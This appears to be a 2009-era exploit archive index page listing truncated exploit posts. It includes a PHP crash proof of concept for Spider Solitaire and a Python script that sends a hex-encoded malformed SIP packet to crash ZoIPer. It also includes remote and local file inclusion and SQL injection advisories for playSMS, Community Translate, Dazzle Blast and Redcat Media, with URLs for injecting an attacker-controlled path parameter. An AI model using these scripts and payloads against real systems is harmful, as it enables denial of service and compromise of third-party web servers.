Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

!--php/*Spider Solitaire (Windows XP SP2) Local Crash PoCBy SirGodwww.insecurity.rowww.twitter.com/SirGodLoading a corrupt save file(spider.sav) will result in a local crashof Spider Solitaire*/$username="pwn"; //Replace with your computer username$file="spider.sav";$junk="Spider Solitaire Local Crash";$handle = fopen($file, 'w') or die("Can't create file");fwrite($handle,$junk);fclose($handle);$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";if(!copy($file,$file2)){ die("Can't copy file");} else{ echo "File succesfully...

Read More

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python# ZoIPer v2.22 Call-Info Remote Denial Of Service.# Remote Crash P.O.C.# Author: Tomer Bitton (Gr33n_G0bL1n)# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10## Vendor Notified on: 21/09/2009# Vendor Fix: Fixed in version 2.24 Library 5324## Bad Chars: \x20 , \x09import sysimport socketimport osdef main(argc , argv):if len(sys.argv) != 2:os.system("cls")sys.exit("Usage: " + sys.argv[0] + " \n")target_host = sys.argv[1]target_port = 5060evil_packet ="\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"os.system("cls")print...

Read More

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]Author: Maksymilian Arciemowiczhttp://SecurityReason.comDate:- - Dis.: 10.07.2009- - Pub.: 06.08.2009Risk: HighAffected Software:- - PHP 5.3.0- - PHP 5.2.10Original URL:http://securityreason.com/achievement_securityalert/65- --- 0.Description ---PHP is an HTML-embedded scripting language. Much of its syntax is borrowedfrom C, Java and Perl with a couple of unique PHP-specific features thrownin. The goal of the language is to allow web developers to writedynamically...

Read More

playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o][x] playSMS version 0.9.4 [x][x] RFI&LFI Vulnerability [x]Download:http://playsms.sourceforge.net/ 167.9 KBDate : 14 Oct 2009[o]====================================[o]file: /lib/function.php// main functionsinclude "$apps_path[libs]/fn_logger.php"; line 4include "$apps_path[libs]/fn_auth.php"; line 5include "$apps_path[libs]/fn_user.php"; line 6include "$apps_path[libs]/fn_sendsms.php"; line 7include "$apps_path[libs]/fn_sendmail.php";...

Read More

jasakom has been hacked

...

Read More

Redcat Media SQL Injection Vulnerability

x]==========================================[x]| AntiSecurity[dot]org |[x]==========================================[x][x]==========================================[x]| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability| Vendor : http://www.redcatmedia.co.uk/| Date : 2 oktober 2009 ( Indonesia )| Author : s4va| Contact : sava_sword@yahoo.com| Blog : http://s4vaworld.uni.cc[x]==========================================[x]| Dork : “Powered...

Read More

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion VulnerabilitySoftware : Community TranslateProject Home : http://code.google.com/p/communitytranslate/Author : NoGeContact : noge[dot]code[at]gmail[dot]comBlog : http://evilc0de.blogspot.com/Home : http://antisecurity.org/[o] Vulnerable filerequire_once("$rd/include/utilfunctions.php");include/functions.php[o] Exploithttp://localhost/[path]/include/functions.php?rd=[evilc0...

Read More

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion VulnerabilitySoftware : Dazzle BlastDownload : http://www.dazzleblast.com/dazzleblast.zipAuthor : NoGeContact : noge[dot]code[at]gmail[dot]comBlog : http://evilc0de.blogspot.com/Home : http://antisecurity.org/[o] Vulnerable filerequire_once($ROOTDIR.'admin/functions/general.php');admin/includes/createemails.php[o] Exploithttp://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0...

Read More